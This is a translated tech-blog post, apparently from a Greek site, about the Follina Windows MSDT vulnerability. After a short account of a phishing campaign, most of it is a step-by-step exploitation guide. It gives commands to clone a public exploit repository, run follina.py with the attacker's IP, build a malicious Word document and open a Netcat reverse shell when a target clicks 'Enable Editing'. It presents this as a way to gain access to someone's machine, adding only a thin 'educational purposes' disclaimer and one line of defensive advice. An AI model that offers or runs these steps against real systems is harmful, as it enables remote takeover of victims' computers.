Exploitation guide for Follina

Some European governments have been the target of a phishing campaign that uses malicious rich text documents (RTF from Rich Text Format). These documents were designed to exploit a critical (zero-day) Windows vulnerability known as Follina.

1200x628 follina zero day vulnerability v2 d

The attackers used promises of salary increases to get employees to open documents containing a malicious Powershell script.

With the PowerShell script of this attack, attackers are able to gather large amounts of information:

Browser passwords: Google Chrome, Mozilla Firefox, Microsoft Edge, Opera, Yandex, Vivaldi, CentBrowser, Comodo, CheDot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc and AVAST Browser.

Data from other applications: Mozilla Thunderbird, Netsarang session files, Windows Live Mail contacts, Filezilla passwords, ToDesk configuration file, WeChat, Oray SunLogin RemoteClient, MailMaster, ServU, Putty, FTP123, WinSCP, RAdmin, Microsoft Office, Navicat

Information from Windows: Computer information, username list, Windows domain information

Let's now see how we can use Follina for our personal use and gain access to a Windows machine.

First we will download Follina with the following command:

git clone https://github.com/JohnHammond/msdt-follina

It will show us the following results:

msdt follina github repo cloning
Then we will type the following commands:

cd msdt-follina

python3 follina.py -i X.X.X.X

 

In the above command XXXX is our IP address. Now in the screenshot below we can see that our malicious .doc file has been created and is starting the listener for the HTML payload on port 8000.

follina starts

So we see the malicious file we just made in our archives (in the directory msdt-follina), as we can see in the screenshot below:

follina malicious document file

At this point we should use our knowledge and our brains to "serve" the attacker the malicious file and get remote access to his machine.

Every time the attacker opens the file and clicks “Enable Editing” in MS Word (the older version of MS Office does not require this, we can access them directly), we reset the session we already got earlier, as you can see in the screenshot below:

got reverse connection

By default, the script opens the Windows Calculator application.

virtualbox windows 10 11 06 2022 19 47 58

It can do much more if we create the payload using the following command and then we can even get shell directly:

python3 follina.py -r 7777

In the above command we use port 7777 to make the connection with payload, but we can also use any unused port.

The above command will create a Netcat payload and start the listener and then create a DOC file in the directory msdt-follina. After our target clicks “Enable Editing”, we will successfully get access as we can see in the screenshot below:

got shell of wiindows pc

Now we can do anything the user of the victim computer can do. This vulnerability is not likely to be patched for at least some time yet. Our article is inspired by our friend NetworkChuk's YouTube video and we can see the video below (we made small changes to avoid errors):

Warning: – This article is for educational purposes only. We did it on our own system and didn't hurt anyone. You should do the same.

How to be safe from Follina?

Microsoft published an article that shows how can we be safe from Follina exploitation . But as we know first of all we don't need to open suspicious links or files from internet.

Things could be worse than we think because there may be many 0days that we don't know about.

iGuRu.gr The Best Technology Site in Greecegns

every publication, directly to your inbox

Join the 2.110 registrants.
Follina,0day,zero-day,iguru

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).